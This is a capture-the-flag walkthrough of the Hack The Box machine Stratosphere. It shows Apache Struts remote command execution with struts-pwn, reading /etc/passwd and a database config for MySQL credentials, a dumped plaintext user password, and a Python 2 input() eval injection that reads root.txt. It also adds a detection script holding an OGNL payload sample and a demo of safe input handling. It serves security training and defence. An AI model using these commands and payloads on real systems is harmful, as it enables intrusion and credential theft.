Introduction
Stratosphere is a machine on Hack The Box.
Hack The Box is an online platform that lets you test your penetration testing skills and exchange ideas and methodologies with other members with similar interests. It contains many challenges that are constantly updated.
This article shows how to hack the Stratosphere box and obtain user.txt and root.txt.
Collection
First, we scan the Stratosphere box for open ports and see whether any of the exposed services look weak.
Three ports are open: 22 is SSH and 80 is a web server. 8080 is probably another web or application server (Tomcat, WebLogic or similar); we will find out when we look at it.
Hack the Stratosphere Box
Hack the Stratosphere box HTTP service
An HTTP server is running on this box, so let's start with that service. Open a browser and visit the site.
Nothing on the page itself stands out, so we use dirb to enumerate directories on the web server.
Unluckily, the default wordlist finds nothing, so I tried a bigger dictionary to see whether anything turns up.
Finally, we find a sub-folder named “Monitoring”.
Visiting http://10.10.10.64/Monitoring/ redirects to http://10.10.10.64/Monitoring/example/Welcome.action
Hack Apache Struts
As you may know, the “.action” extension is distinctive: it is the default extension mapped to Apache Struts 2 actions, and Struts has a long history of remote code execution vulnerabilities. The same application answers on both port 80 and port 8080, and the commands below use either.
We try struts-pwn first.
Clone it with git, then run it against the Welcome.action URL with a harmless test command:
python struts-pwn.py --url http://10.10.10.64:8080/Monitoring/example/Welcome.action -c 'id'
The output shows that the command was executed, so we have remote command execution on the box.
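For the defensive side of this step, here is an added example (not code from the write-up or from struts-pwn) showing what the exploit traffic looks like to a detection engineer. struts-pwn implements CVE-2017-5638 (S2-045), which delivers an OGNL expression inside the Content-Type header, so a Content-Type value containing OGNL delimiters such as %{ or Java class references is a strong indicator. The log format (client, path and Content-Type separated by tabs), the sample lines and the payload string are constructed for this example.

```python
"""Flag Apache Struts OGNL injection attempts in Content-Type headers.

Added example, not part of the original write-up or of struts-pwn. struts-pwn
exploits CVE-2017-5638 (S2-045), which smuggles an OGNL expression into the
Content-Type header; a legitimate media type never contains the markers below.
The log format and sample lines are constructed for this example.
"""
import re

# OGNL expression delimiters and Java references used by public S2-045 payloads.
OGNL_MARKERS = (
    "%{",                 # OGNL expression start
    "${",                 # alternate delimiter seen in payload variants
    "#_memberAccess",     # sandbox bypass
    "@java.lang.Runtime",
    "@org.apache.commons.io.IOUtils",
    "java.lang.ProcessBuilder",
)

# Loose RFC 7231 media-type grammar: type/subtype plus optional ;name=value parameters.
_CONTENT_TYPE_RE = re.compile(
    r"^[\w!#$&^.+-]+/[\w!#$&^.+-]+(\s*;\s*[\w.-]+=(\"[^\"]*\"|[^\s;]*))*\s*$"
)


def flag_content_type(value: str) -> list:
    """Return the OGNL markers found in a Content-Type value ([] when clean).

    Values with no known marker that do not even parse as a media type are
    reported as 'malformed media type' so novel payload variants still surface.
    """
    hits = [marker for marker in OGNL_MARKERS if marker in value]
    if not hits and not _CONTENT_TYPE_RE.match(value):
        hits.append("malformed media type")
    return hits


# Constructed log: client IP, request path and Content-Type, tab separated.
SAMPLE_LOG = [
    "10.10.14.5\t/Monitoring/example/Welcome.action\tapplication/x-www-form-urlencoded",
    "10.10.14.5\t/Monitoring/example/Welcome.action\t"
    "%{(#_='multipart/form-data').(#cmd='id').(#p=new java.lang.ProcessBuilder(#cmd))}",
    "10.10.14.9\t/Monitoring/example/upload.action\t"
    "multipart/form-data; boundary=----WebKitFormBoundaryx1",
]


def scan_log(lines) -> list:
    """Return (client, path, markers) for every line whose Content-Type is suspicious."""
    findings = []
    for line in lines:
        client, path, content_type = line.split("\t", 2)
        markers = flag_content_type(content_type)
        if markers:
            findings.append((client, path, markers))
    return findings


if __name__ == "__main__":
    for client, path, markers in scan_log(SAMPLE_LOG):
        print(f"{client} {path}: {', '.join(markers)}")
```

The marker list catches the well-known payloads; the media-type grammar check is what catches the ones you have not seen yet, because no browser or client sends a Content-Type that is not a media type.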
Get User.txt
Next we need a way to get user.txt. First, read /etc/passwd to identify the user accounts.
The user account is richard. Let's try to list richard's home folder.
Permission denied. However, since the current user is “tomcat8”, we should be able to read the web application folder, and the web files may contain a MySQL password.
Among the folders and files there, we look for sensitive information.
Reading the “db_connect” file gives us the MySQL password.
Recall that the initial port scan did not show the MySQL port (3306) as open. This means MySQL is bound only to the loopback address (127.0.0.1), or is filtered, so we cannot connect to it directly from our machine.
Right now, we have:
- A remote command exec;
- MySQL Password
- MySQL can only be reached from the box's own localhost.
With the remote command execution we can write a bash script on the box that connects to the local MySQL server and dumps the sensitive data from the database. Because each struts-pwn call runs a single command, the script is assembled one line at a time with echo:
python struts-pwn.py --url http://10.10.10.64:80/Monitoring/example/Welcome.action -c 'echo "#!/bin/bash" > /tmp/1.sh'
python struts-pwn.py --url http://10.10.10.64:80/Monitoring/example/Welcome.action -c 'echo "mysql -uadmin -padmin -D users << EOF" >> /tmp/1.sh'
python struts-pwn.py --url http://10.10.10.64:80/Monitoring/example/Welcome.action -c 'echo "select * from accounts;" >> /tmp/1.sh'
python struts-pwn.py --url http://10.10.10.64:80/Monitoring/example/Welcome.action -c 'echo "EOF" >> /tmp/1.sh'
After running these commands, /tmp/1.sh contains those four lines: a shebang, the mysql command reading its statements from a heredoc, the query, and the heredoc terminator.
Running the script (bash /tmp/1.sh, through the same command execution) returns the following row:
Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard
Now we have richard's password. Log in as richard via SSH and read user.txt.
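The four-step script above works but is awkward, because every line has to survive the quoting of both your own shell and the bash that struts-pwn spawns on the target. As an added example (not the write-up's own method), the helper below builds a single mysql -e command for the same query, quoted with shlex so it can be passed as the -c argument in one call, and parses the tab-separated --batch output into a username-to-password map. The credentials admin/admin, the database users and the table accounts come from the write-up; the column names in the constructed sample output are assumptions.

```python
"""Run a one-shot MySQL query through a command-execution primitive.

Added example, not the write-up's own method: instead of assembling /tmp/1.sh
line by line, one `mysql --batch -e` invocation is pushed through the same
struts-pwn -c channel. Credentials and object names come from the write-up;
the column names in SAMPLE_OUTPUT are assumptions.
"""
import shlex


def mysql_query_command(user: str, password: str, database: str, query: str) -> str:
    """Build a shell command that runs `query` against the local MySQL server
    non-interactively and prints the result as tab-separated rows.

    --batch gives tab-separated output with a header line; -e runs the statement
    and exits. shlex.quote keeps characters such as ; * ' inside the query from
    being interpreted by the bash that executes the command on the target.
    """
    return " ".join([
        "mysql",
        "--batch",
        "-u" + shlex.quote(user),
        "-p" + shlex.quote(password),
        "-D", shlex.quote(database),
        "-e", shlex.quote(query),
    ])


def parse_batch_output(text: str) -> list:
    """Turn `mysql --batch` output (header line plus tab-separated rows) into dicts."""
    lines = [line for line in text.splitlines() if line.strip()]
    if not lines:
        return []
    header = lines[0].split("\t")
    return [dict(zip(header, row.split("\t"))) for row in lines[1:]]


def credentials_from_output(text: str) -> dict:
    """Return {username: password} for every row of the dump."""
    return {row["username"]: row["password"] for row in parse_batch_output(text)}


# Constructed sample output modelled on the row shown in the write-up;
# the column names are assumed, not taken from the box.
SAMPLE_OUTPUT = (
    "fullName\tpassword\tusername\n"
    "Richard F. Smith\t9tc*rhKuG5TyXvUJOrE^5CK7k\trichard\n"
)


if __name__ == "__main__":
    print(mysql_query_command("admin", "admin", "users", "select * from accounts;"))
    print(credentials_from_output(SAMPLE_OUTPUT))
```

The returned string is what goes after -c (wrapped in double quotes on your own shell, since the query is already single-quoted). Passing -p on the command line exposes the password in the process list on the target; that does not matter here, where we already run as the tomcat8 user that owns the config, but it is worth remembering on shared systems.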
Get Root.txt
Now we work on privilege escalation.
First, check the sudo list (sudo -l) to see what we can run with sudo.
It shows a Python script we can run with sudo, so we take a look at it.
It appears to be a password-cracking quiz… but we are hackers; we do not need to play along.
As you may know, Python 2 has a well-known pitfall: the built-in input() evaluates whatever is typed as a Python expression (it is equivalent to eval(raw_input())). This script reads our answer that way, so we can inject code at the prompt.
We just enter the following expression at the prompt, and the script, running as root under sudo, prints root.txt:
__import__('os').system('cat /root/root.txt')
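To make the mechanism concrete, here is an added example (not the script from the box) that reproduces Python 2's input() behaviour in Python 3 and contrasts it with two safe ways of reading the answer. The quiz answer hunter2, the SIDE_EFFECT dictionary and the injection string are constructed for the demonstration; the injection records the process id instead of reading /root/root.txt, so it is harmless to run.

```python
"""Why a Python 2 input() prompt is a code-injection point.

Added example, not the script found on the box. In Python 2, input(prompt) is
literally eval(raw_input(prompt)): the typed text is evaluated as a Python
expression before the script sees it. The functions below reproduce that
behaviour in Python 3 against a constructed quiz answer, next to two safe
alternatives, so the mechanism behind __import__('os').system(...) can be
exercised offline with a harmless side effect instead of cat /root/root.txt.
"""
import ast

EXPECTED = "hunter2"     # constructed "correct answer" the quiz would compare against
SIDE_EFFECT = {}         # records whether injected code actually ran


def py2_style_check(answer_text: str) -> bool:
    """Vulnerable: mimics `if input('answer: ') == EXPECTED` under Python 2.

    The typed text goes through eval() first, so an expression runs with the
    script's privileges (root when the script is launched via sudo) before any
    comparison happens. Note the consequence for honest users: a string answer
    has to be typed with quotes ('hunter2'), because bare hunter2 is a NameError.
    """
    answer = eval(answer_text)   # exactly what Python 2 input() does internally
    return answer == EXPECTED


def safe_check(answer_text: str) -> bool:
    """Hardened: treat the input as an opaque string, as Python 3 input() and
    Python 2 raw_input() do. No evaluation, so no injection."""
    return answer_text == EXPECTED


def safe_literal_check(answer_text: str) -> bool:
    """If the script genuinely needs a Python literal (a number, a tuple),
    ast.literal_eval parses literals only and rejects calls, attribute access
    and imports, turning an injection attempt into a wrong answer."""
    try:
        answer = ast.literal_eval(answer_text)
    except (ValueError, SyntaxError):
        return False
    return answer == EXPECTED


# Constructed injection with the same shape as the payload used on the box, but a
# harmless effect: it records the process id in SIDE_EFFECT instead of reading /root.
INJECTION = "SIDE_EFFECT.__setitem__('ran', __import__('os').getpid())"


def demo() -> dict:
    """Run the three checkers against the injection and report what happened."""
    SIDE_EFFECT.clear()
    vulnerable = py2_style_check(INJECTION)    # False: None != "hunter2", but the code ran
    ran_under_eval = "ran" in SIDE_EFFECT
    SIDE_EFFECT.clear()
    safe_check(INJECTION)                      # plain string comparison, nothing executed
    safe_literal_check(INJECTION)              # literal_eval rejects the call, nothing executed
    return {
        "py2_input_rejected_answer": not vulnerable,
        "py2_input_ran_injected_code": ran_under_eval,
        "safe_variants_ran_injected_code": "ran" in SIDE_EFFECT,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point the demo makes is that the comparison result is irrelevant: the injected expression has already executed by the time the vulnerable script decides the answer was wrong, which is exactly why the payload on the box works without guessing the password.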
Summary
This box is not very complicated: everything is there, you just need to know what to do. For example, if you don't know what Apache Struts is, you will probably get stuck. I spent most of the time on enumeration (I am in Australia, and the connection to the HTB server is not fast). The difficulty of this box is around 4/10.
There are other Hack The Box write-ups as well.